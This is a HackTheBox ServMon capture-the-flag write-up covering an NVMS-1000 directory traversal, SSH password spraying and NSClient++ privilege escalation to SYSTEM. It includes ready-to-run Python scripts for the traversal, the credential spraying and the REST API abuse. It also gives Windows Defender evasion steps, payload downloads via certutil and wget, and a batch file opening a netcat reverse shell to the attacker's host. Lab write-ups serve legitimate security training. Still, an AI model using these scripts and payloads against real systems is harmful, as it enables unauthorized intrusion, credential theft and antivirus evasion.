HackTheBox ServMon Writeup

2/3/2024

This write-up walks through the ServMon machine on HackTheBox, a Windows server running a vulnerable NVMS-1000 installation. A directory traversal in NVMS-1000 leaks a password list, a small password-spraying script against SSH turns that list into initial access, and a known NSClient++ weakness is used to escalate to SYSTEM. Along the way it also covers some very basic Windows Defender evasion.

Overview

A simple box with a few rough edges: the web apps are finicky, and Windows Defender was enabled, which caused some minor issues. It is simple nonetheless, but it involves a lot of reading the application documentation.

Enumeration

The IP of the machine is 10.10.10.184.

Nmap Scan

We start with the typical Ippsec scan.

nmap -sC -sV -oA nmap/ServMon 10.10.10.184

[Screenshot: Nmap scan output]

Interesting ports: 21 (FTP), 22 (SSH), 80 (HTTP), 139/445 (SMB) and 8443 (HTTPS).

We can try anonymous FTP and SMB logins.

There are also two web apps (ports 80 and 8443) that we can take a look at if those don't pan out.

FTP Login (Port 21)

Anonymous login works!

[Screenshot: anonymous FTP login]

Two files are present: Users\Nadine\Confidential.txt and Users\Nathan\Notes to do.txt.

[Screenshot: FTP files]

From these files we learn that a Passwords.txt file was left on Nathan's Desktop and has not been removed.

Webserver (Port 80)

[Screenshot: website on port 80]

We can see that it is running NVMS-1000. A quick Google search for "NVMS-1000 exploits" turns up CVE-2019-20085, a directory traversal vulnerability: the web server does not strip ../ segments from the request path, so any file on the drive can be read.

We can try to fish for the Passwords.txt file. We know it is on Nathan's Desktop, so the target is Users/Nathan/Desktop/Passwords.txt, prefixed with enough ../ segments to climb from the web root to the drive root (e.g. ../../../../../../../Users/Nathan/Desktop/Passwords.txt).
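The traversal request as a small Python script (an added example, not code from the original post): it builds the ../ path, sends it verbatim with http.client (which, unlike some higher-level clients, does not collapse ../ segments; curl needs --path-as-is for the same effect) and splits the returned file into candidate passwords. The traversal depth of 8 and the constructed SAMPLE_BODY used for offline runs are assumptions; only the target IP and file path come from the post.

```python
"""Added example: read a file through the NVMS-1000 directory traversal
(CVE-2019-20085). Illustration code, not part of the original write-up."""
import http.client


def traversal_path(target_file, depth=8):
    """Build a path that climbs `depth` directories before descending into
    target_file. NVMS-1000 does not normalise the ../ segments, so the path
    escapes the web root and reaches the drive root. depth=8 is an assumption;
    any value that over-shoots the root still works on Windows."""
    return "/" + "../" * depth + target_file.lstrip("/")


def fetch_raw(host, port, path, timeout=10):
    """Send the path exactly as given. http.client only rejects control
    characters, so the ../ segments reach the server untouched."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def parse_password_list(body):
    """Turn the raw file body into a list of candidates, dropping blank lines
    and Windows line endings so each entry can be fed straight to a sprayer."""
    text = body.decode("utf-8", "replace")
    return [line.strip() for line in text.splitlines() if line.strip()]


# Constructed sample (assumption): a stand-in for the real file so the parser
# can be exercised offline. It reuses three values quoted in the post.
SAMPLE_BODY = b"1nsp3ctTh3Way2Mars!\r\nTh3r34r3To0M4nyTrait0r5!\r\n\r\nL1k3B1gBut7s@W0rk\r\n"

if __name__ == "__main__":
    path = traversal_path("Users/Nathan/Desktop/Passwords.txt")
    print("GET", path)
    try:
        status, body = fetch_raw("10.10.10.184", 80, path)
    except OSError as exc:  # target not reachable: fall back to the sample
        print("request failed:", exc)
        status, body = 200, SAMPLE_BODY
    if status == 200:
        for pw in parse_password_list(body):
            print(pw)
    else:
        print("server answered", status)
```

Run it from the attack box with the target reachable and it prints the password list; with no target it falls back to the constructed sample so the parsing step can still be seen.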

[Screenshot: directory traversal response]

We get a list of passwords. We can try them against SSH, but we do not know which password maps to which user.

SSH Login (Port 22)

Let us create a quick users.txt and passwd.txt.

users.txt:

Nathan
Nadine
administrator

passwd.txt:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Since I can't use Metasploit on the OSCP, I will write a quick SSH brute-force script.

import paramiko

usernames_file = 'users.txt'
passwords_file = 'passwd.txt'
target_hostname = '10.10.10.184'
port = 22


def attempt_login(hostname, port, username, password):
    """Return True if the SSH server accepts username:password."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # allow_agent/look_for_keys off so only the supplied password is tried
        client.connect(hostname, port=port, username=username, password=password,
                       timeout=10, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    except (paramiko.SSHException, OSError) as exc:
        # connection-level failure (banner timeout, reset): report, don't crash
        print(f"Error for {username}:{password}: {exc}")
        return False
    finally:
        client.close()


with open(usernames_file, 'r') as uf:
    usernames = [line.strip() for line in uf if line.strip()]
with open(passwords_file, 'r') as pf:
    passwords = [line.strip() for line in pf if line.strip()]

for username in usernames:
    for password in passwords:
        if attempt_login(target_hostname, port, username, password):
            print(f"Valid credentials found: {username}:{password}")
            break  # one hit per user is enough; move on to the next user

Valid credentials found: Nadine:L1k3B1gBut7s@W0rk

[Screenshot: user flag]

Privilege Escalation

Now this is the part I was stuck on for a while; once I realized what I was missing I felt quite stupid.

We know from the notes in Nathan's FTP directory that the server is running NSClient++.

NSClient++ is installed in C:\Program Files\NSClient++. From there we can check the version with nscp.

nadine@SERVMON C:\Program Files\NSClient++>nscp --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

There is a known privilege escalation for this version: the NSClient++ service runs as SYSTEM, and anyone holding the web interface's admin password can register an external script through the web UI or REST API and have the service execute it.

The admin password for the web interface is stored in clear text in nsclient.ini, in the same C:\Program Files\NSClient++ directory.
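A small parser for the parts of nsclient.ini that matter for this escalation, as an added example (not code from the original post): the web password, which hosts may talk to the web interface, and whether the modules the external-script route relies on are enabled. SAMPLE_INI is a constructed excerpt that follows NSClient++'s real section and key layout and reuses the password quoted in the post; it is not a copy of the file from the box, and the module list is an assumption.

```python
"""Added example: extract the exploit preconditions from nsclient.ini.
Illustration code, not part of the original write-up."""
import configparser

# Constructed excerpt (assumption): mirrors NSClient++'s section/key naming
# but is not the actual file from the box.
SAMPLE_INI = """
; NSClient++ configuration
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = ew2x6SsGTxjRwXOT
"""


def load_ini(text):
    """NSClient++ uses ';' comments, keys containing spaces and slash-named
    sections; configparser handles all of that once interpolation is off and
    duplicate keys are tolerated."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def load_ini_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return load_ini(fh.read())


def admin_password(cp):
    return cp.get("/settings/default", "password", fallback=None)


def allowed_hosts(cp):
    raw = cp.get("/settings/default", "allowed hosts", fallback="")
    return [h.strip() for h in raw.split(",") if h.strip()]


def enabled_modules(cp):
    """configparser lower-cases keys, so module names come back lower-cased."""
    if not cp.has_section("/modules"):
        return []
    on = ("enabled", "1", "true")
    return sorted(k for k, v in cp.items("/modules") if v.strip().lower() in on)


def privesc_preconditions(cp):
    """The external-script route needs the web server (REST API) and
    CheckExternalScripts; loopback-only allowed hosts means the API has to be
    reached through a port forward rather than directly."""
    mods = enabled_modules(cp)
    return {
        "api_reachable": "webserver" in mods,
        "external_scripts": "checkexternalscripts" in mods,
        "loopback_only": allowed_hosts(cp) == ["127.0.0.1"],
    }


if __name__ == "__main__":
    cp = load_ini(SAMPLE_INI)   # swap for load_ini_file(r"C:\Program Files\NSClient++\nsclient.ini")
    print("password:", admin_password(cp))
    print("allowed hosts:", allowed_hosts(cp))
    print("enabled modules:", enabled_modules(cp))
    print(privesc_preconditions(cp))
```

On the box itself, point load_ini_file at the real nsclient.ini; the loopback_only flag is the quick check for whether a plain connection to port 8443 from the attack machine will be refused.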

Port forward the NSClient port

We need to reach the NSClient++ web interface on port 8443 from the attack machine, so we forward it over SSH. Forwarding to 127.0.0.1 on the target matters: NSClient++ only accepts web connections from the addresses in its allowed hosts setting (localhost here), so a direct connection from the attack box would be refused.

ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

The challenge

So here is the challenge. Windows Defender was enabled. This was not the default configuration of the box; however, it makes for a nice challenge.

So we grab a Netcat executable and host it with a Python HTTP server.

python -m http.server 8000

Now let's try to get the file.

nadine@SERVMON C:\Program Files\NSClient++>certutil -urlcache -f http://10.10.14.15:8000/nc.exe nc.exe
Access is denied.

At first, I thought I did not have write permissions, which seemed odd; I checked, and Nadine does have write permissions there.

Eventually, I switched to PowerShell and tried the same command.

PS C:\Program Files\NSClient++> certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe
At line:1 char:1
+ certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

I thought it was Netcat being flagged. (It was not: the ScriptContainedMaliciousContent parser error is AMSI blocking the certutil command line itself, before anything is downloaded.)

So I tried compiling Netcat from C with a lot of changes. That did not work either. Next I tried a PowerShell reverse shell.

I tested the command in Nadine's shell first; I had to use PowerShell #3 from revshells.com, and it worked there. I then tried it through the NSClient++ web UI, and that did not work. So I looked through the documentation and found the REST API.

Sent the requests to the API endpoint: one PUT to upload the script, then a GET to execute it (-k because the web interface uses a self-signed certificate).

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary @rev.bat
curl -s -k -u admin:ew2x6SsGTxjRwXOT https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=10s

Still did not work! I was a bit worried. I started this box late during the day and I usually cannot sleep until I finish the box.

I decided to take a deep breath and look at what was actually happening, and to my surprise the HTTP server never received a request from the machine.

So the command itself was being blocked by Defender before it ever reached out to the attack box.

Solution

Let me try wget in PowerShell (an alias for Invoke-WebRequest, so -o resolves to -OutFile). I need the nc64.exe binary; the regular nc.exe gets removed by Windows Defender.

wget http://10.10.14.15:8000/nc64.exe -o nc.exe

Ok, that works.

Let us create the .bat file (rev.bat) now, pointing at the downloaded binary:

C:\Users\Nadine\nc.exe 10.10.14.15 9002 -e cmd.exe

Now run the same two API requests as before, with a listener waiting on the attack box.

nc -lvnp 9002
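The same upload-and-execute sequence as a Python script, added here as an example (it is not the post's own tooling): it authenticates with HTTP basic auth, PUTs the batch file to the scripts endpoint and then calls the execute endpoint, all through the SSH forward on 127.0.0.1:8443. The script name revshell, the listener 10.10.14.15:9002, the nc.exe path and the admin password are taken from the post; treating the execute call's timeout as expected (netcat keeps the script process alive, so the API only answers when the time= limit expires) is my addition.

```python
"""Added example: drive the NSClient++ REST API to upload and run a batch
script. Illustration code, not part of the original write-up."""
import base64
import ssl
import urllib.error
import urllib.request

BASE = "https://127.0.0.1:8443"  # reached through the SSH -L forward (assumption: same port)


def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def script_url(base, name):
    """Upload endpoint from the post: the file lands under scripts/ and the
    service exposes it as a query called `name`."""
    return f"{base}/api/v1/scripts/ext/scripts/{name}.bat"


def execute_url(base, name, time="10s"):
    """Execute endpoint from the post; time= bounds how long NSClient++ waits."""
    return f"{base}/api/v1/queries/{name}/commands/execute?time={time}"


def make_bat(nc_path, attacker_ip, port):
    """Batch payload with the same shape as the post's rev.bat."""
    return f"{nc_path} {attacker_ip} {port} -e cmd.exe\r\n"


def _insecure_ctx():
    # The web interface uses a self-signed certificate (curl -k in the post).
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def api_call(url, headers, data=None, method="GET", timeout=15):
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    with urllib.request.urlopen(req, context=_insecure_ctx(), timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def upload_and_run(base, user, password, name, bat_text):
    hdrs = basic_auth_header(user, password)
    status, body = api_call(script_url(base, name), hdrs,
                            data=bat_text.encode(), method="PUT")
    print("upload:", status, body.strip())
    try:
        status, body = api_call(execute_url(base, name), hdrs)
        print("execute:", status, body.strip())
    except (urllib.error.URLError, TimeoutError) as exc:
        # Expected once the reverse shell connects: the script never exits,
        # so the API only returns when time= runs out. Check the listener.
        print("execute did not return cleanly (check your listener):", exc)
        status = None
    return status


if __name__ == "__main__":
    bat = make_bat(r"C:\Users\Nadine\nc.exe", "10.10.14.15", 9002)
    upload_and_run(BASE, "admin", "ew2x6SsGTxjRwXOT", "revshell", bat)
```

Start nc -lvnp 9002 first, then run the script with the SSH forward up; the shell arrives as the user the NSClient++ service runs as, not as Nadine.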

[Screenshot: shell with administrative privileges]

Conclusion

Quite a fun box. Windows Defender made things tricky and forced me to do a ton of digging; however, once I figured out what to look for, the box became quite a breeze.